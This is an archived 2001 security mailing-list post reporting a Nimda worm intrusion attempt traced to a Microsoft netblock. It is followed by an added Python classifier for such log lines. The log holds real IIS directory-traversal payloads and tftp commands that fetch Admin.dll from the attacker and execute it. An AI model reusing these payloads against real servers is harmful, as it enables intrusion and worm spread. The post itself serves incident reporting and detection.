Microsoft's Early Xmas Present.

From: Jay D. Dyson (jdysonat_private)
Date: Fri Dec 28 2001 - 18:11:23 PST

    Hi folks,
    
    	Normally I wouldn't be sending this out, but I figure folks need
    to be aware and wary, considering the origin of this intrusion attempt.
    
    	I received an early Xmas present from Microsoft.  No, I didn't get
    XP, nor did I get the latest Office software suite.
    
    	I got a Nimda intrusion attempt.
    
    	Early Bird[1] picked up on this intrusion attempt and immediately
    notified Microsoft.  I've yet to hear back from Microsoft as to why this
    attack from their network came to pass[2].
    
    	For those who are interested, here's the log excerpt. 
    
    208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"
    
    $ whois -h whois.arin.net 208.229.100.126
    
    Microsoft Labs (NETBLK-UU-208-229-100-D1)
       One Microsoft Way
       Redmond, WA 98052
       US
    
       Netname: UU-208-229-100-D1
       Netblock: 208.229.100.0 - 208.229.101.255
    
       Coordinator:
          Steig, Rick  (RS8676-ARIN)  a-rickstat_private
          (425) 703-3061
    
       Record last updated on 03-Nov-1997.
       Database last updated on  27-Dec-2001 19:55:32 EDT.
    
    - -Jay
    
    1.	http://www.treachery.net/earlybird/
    2.	If anyone from Microsoft is reading this, I'd appreciate something
    	more pleasant next holiday season.  (FYI, the machine you hit ran
    	XP for only 15 seconds.  It now runs Linux.)
    
       (    (                                                        _______
       ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
     C|~~|C|~~| (>----- Jay D. Dyson -- jdysonat_private -----<) |    = |-'
      `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
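A defender's-eye reading of the excerpt, as an added example that is not part of the original post: a small Python classifier that decodes the double-encoded (..%255c..) and overlong-UTF-8 (..%c1%1c.., ..%c0%af..) traversal forms seen in the log and tags each stage of the Nimda sequence (root.exe probe, cmd.exe reached by traversal, tftp pull of Admin.dll, execution of Admin.dll). The sample lines are constructed, modelled on the excerpt, and use documentation addresses rather than the source address in the post.

```python
import re
from urllib.parse import unquote

# NCSA combined log format, the format of the excerpt above.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Malformed UTF-8 byte pairs that the unpatched IIS of the day decoded as a
# path separator; a strict decoder rejects them, so they are folded by hand.
OVERLONG_SEPARATORS = {'\xc0\xaf': '/', '\xc0/': '/', '\xc1\x1c': '\\', '\xc1\x9c': '\\'}

def normalize(raw: str) -> str:
    r"""Percent-decode twice (so ..%255c.. becomes ..\..), fold the overlong
    separators, then canonicalise to forward slashes and lower case."""
    s = unquote(unquote(raw, encoding='latin-1'), encoding='latin-1')
    for bad, good in OVERLONG_SEPARATORS.items():
        s = s.replace(bad, good)
    return s.replace('\\', '/').lower()

def classify(line: str):
    """Return (ip, status, tags) for a Nimda-style request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m['target'].partition('?')
    path, query = normalize(path), normalize(query)
    tags = []
    if '/root.exe' in path:
        tags.append('root.exe-backdoor')        # Code Red II leftover reused by Nimda
    if '/winnt/system32/cmd.exe' in path:
        tags.append('cmd.exe-via-web')
        if '../' in path:
            tags.append('encoded-traversal')    # ..%255c.., ..%c1%1c.., ..%c0%af.. and kin
    if 'tftp' in query and '-i' in query and 'admin.dll' in query:
        tags.append('tftp-pull-admin.dll')      # stage two: fetch the worm body
    if path.endswith('/admin.dll'):
        tags.append('admin.dll-exec')           # stage three: execute what was fetched
    return (m['ip'], m['status'], tags) if tags else None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]   # hits in log order

# Constructed sample lines modelled on the excerpt; 192.0.2.10 is a documentation address.
SAMPLE = [
    '192.0.2.10 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"',
    '192.0.2.10 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll%20c:\\Admin.dll HTTP/1.0" 200 448 "-" "-"',
    '192.0.2.10 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"',
    '192.0.2.10 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"',
    '198.51.100.7 - - [24/Dec/2001:20:01:00 -0800] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]
```

Run it over a real access log with `scan(open(path))`; a source that moves through all four tags within a couple of minutes is the pattern the excerpt shows.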
    



    This archive was generated by hypermail 2b30 : Sat Dec 29 2001 - 20:27:09 PST